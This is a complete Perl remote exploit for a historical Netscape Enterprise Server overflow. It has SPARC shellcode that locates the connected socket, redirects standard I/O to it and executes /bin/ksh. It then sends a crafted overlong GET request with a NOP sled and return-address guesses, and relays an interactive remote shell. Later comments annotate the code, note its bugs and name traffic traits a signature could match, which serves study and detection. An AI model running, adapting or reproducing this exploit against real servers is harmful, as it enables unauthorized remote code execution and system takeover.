#!/usr/bin/perl
# Historical exploit script, per its own banner, for a Netscape Enterprise
# Server overflow.  The whole file is a flat script with no subroutines and no
# `use strict`/`use warnings`, so every variable below except $host/$port is a
# package global.  The register names in the author's per-instruction comments
# (%l5, %o0, %g1, `ta 8`) are SPARC; the payload is delivered URL-escaped inside
# the path of a single HTTP GET.  Line breaks were restored from a collapsed
# copy; no code token was changed.
use Socket;

# search the socket
# Each 4-byte group is one instruction, annotated by the original author.  The
# first loop walks file descriptors downward from 1025 until getpeername()
# succeeds, i.e. it locates the already-connected socket; the three dup2()
# stanzas then attach stdin/stdout/stderr to it before the final execve().
$shellcode = "%aa%1d%40%15". # // xor %l5, %l5, %l5
"%ac%05%64%02". # // add %l5, 1026, %l6
"%ac%25%a0%01". # // dec %l6
"%90%05%40%16". # // add %l5, %l6 , %o0
"%82%10%20%f3". # // mov 0xf3, %g1
"%91%d0%20%08". # // ta 8
"%90%22%20%01". # // dec %o0 - getpeername()
"%80%a2%3f%ff". # // cmp %o0, -1
"%12%bf%ff%fa". # // be -6
# dup2(sock,0) #
"%aa%1d%40%15". # // xor %l5, %l5, %l5
"%90%05%40%16". # // add %l5, %l6, %o0
"%92%10%20%09". # // mov 9, %o1
"%94%22%40%09". # // sub %o1, %o1, %o2
"%82%10%20%3e". # // mov 0x3e, %g1
"%91%d0%20%08". # // ta 8
# dup2(sock,1) #
"%aa%1d%40%15". # // xor %l5, %l5, %l5
"%90%05%40%16". # // add %l5, %l6, %o0
"%92%10%20%09". # // mov 9, %o1
"%94%05%60%01". # // add %l5, 1, %o2
"%82%10%20%3e". # // mov 0x3e, %g1
"%91%d0%20%08". # // ta 8
# dup2(sock,2) #
"%aa%1d%40%15". # // xor %l5, %l5, %l5
"%90%05%40%16". # // add %l5, %l6, %o0
"%92%10%20%09". # // mov 9, %o1
"%94%05%60%02". # // add %l5, 2, %o2
"%82%10%20%3e". #// mov 0x3e, %g1
"%91%d0%20%08". #// ta 8
# execve("/bin/ksh") #
"%20%bf%ff%ff". # // bn,a
"%20%bf%ff%ff". # // bn,a
"%7f%ff%ff%ff". # // call
"%90%03%e0%24". # // add %o7, 32, %o0
"%92%02%20%10". # // add %o0, 16, %o1
"%98%03%e0%24". # // add %o7, 32, %o4
"%c0%23%20%08". # // st %g0, [%o4+8]
"%d0%23%20%10". # // st %o0, [%o4+16]
"%c0%23%20%14". # // st %g0, [%o4+20]
"%82%20%3f%f5". # // sub %g0, -0xb, g1
"%91%d0%20%08". # // ta 8
"/bin/ksh";

# 0xf99e1360
# Return-address guesses and the NOP-sled unit.  Note the doubled `%%` in these
# four strings: inside a Perl double-quoted string `%%` stays literal, so these
# are sent on the wire as-is, unlike the single-`%` escapes in $shellcode.
# NOTE(review): that looks like a leftover from a printf-based original — the
# author's intent cannot be confirmed from this file.
$offset = "%%f9%%9e%%13%%40";
$offset2 = "%%f9%%9e%%13%%60";
$nop_num = 40;
$nop = "%%80%%1b%%c0%%1f";
$align = 2;     # bytes of 'X' before the sled, presumably for 4-byte alignment
$extra = 1000;  # trailing 'a' filler after the overwritten address
$cutrepad = 932; # target length of the request prefix before the address block

print ("\nRemote Netscape Enterprise Server Exploit |\n");
print ("put into perl by \n\n");
print ("PRIVATE IC CODE - DON'T DISTRIBUTE - PRIVATE IC CODE\n");
print ("Distribute and die....\n\n");

if(@ARGV < 2) { die "usage: $0 \n"; }
my($host,$port) = @ARGV;
# NOTE(review): the pattern is unanchored, so any string containing a digit
# passes; an anchored match would be needed to actually validate the port.
$port =~ /\d+/ || die "port isn't a valid number\n";

# Constructing buffer....
# On-wire layout of the request line (all fixed by the constants above):
#   "GET /" . X*2 . sled*40 . shellcode . 'A' padding up to 932 bytes
#   . offset*7 . offset2 . 'a'*1000 . ".shtml HTTP/1.0" . CRLF CRLF
# The repeated sled bytes, the fixed address bytes and the ~2 KB path ending in
# ".shtml" are the parts of this traffic a signature would key on.
$buffer = "GET /" . "X"x$align . 
"$nop"x$nop_num . $shellcode;
$padd = $cutrepad - length($buffer);
$buffer .= "A"x$padd . "$offset"x7 . $offset2 . "a"x$extra . ".shtml HTTP/1.0";

print ("Good luck!\n");

$iaddr = inet_aton($host) || die "$host isn't up\n";   # name resolution only; "isn't up" overstates it
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
# Bareword handle SOCKET; the `||` binds to the last argument of socket() and
# connect() here, which still works because those arguments are plain scalars.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die "socket error :$!\n";
connect(SOCKET, $paddr) || die "--- unable to establish connection ($!)\n";
print("+++ connected to $host, $port\n");
# Return value of send() is not checked; a short or failed write goes unnoticed.
send(SOCKET, "$buffer\r\n\r\n", 0);
sleep(3); # sleeping, waiting for the code to take effect

# Bitmask for 4-arg select(): watch both STDIN and SOCKET for readability.
vec($rin, fileno(STDIN), 1) = 1;
vec($rin, fileno(SOCKET), 1) = 1;
# Simple two-way relay: STDIN -> socket, socket -> terminal, until either side
# returns EOF (sysread == 0).  This loop never exits normally; everything after
# it is unreachable.
for(;;) { # ripped from venglin cuz i'm lazy
    $read = select($rout=$rin, undef, undef, undef);
    if (vec($rout, fileno(STDIN), 1) == 1) {
        if (sysread(STDIN, $recvbuf, 1024) == 0) { exit; }
        send(SOCKET, $recvbuf, 0);
    }
    if (vec($rout, fileno(SOCKET), 1) == 1) {
        if (sysread(SOCKET, $recvbuf, 1024) == 0) { exit; }
        # NOTE(review): writes to STDIN rather than STDOUT, and passes 1024 as
        # the length regardless of how many bytes sysread() returned; this only
        # displays anything where STDIN is a read/write tty.
        syswrite(STDIN, $recvbuf, 1024);
    }
}
# Unreachable (see loop above); also `Socket` here is the module name, not the
# SOCKET filehandle, so this close is a no-op on an unopened bareword handle.
close Socket;
print "thanks for using this exploit carefully constructed by SteeLe\n";
exit;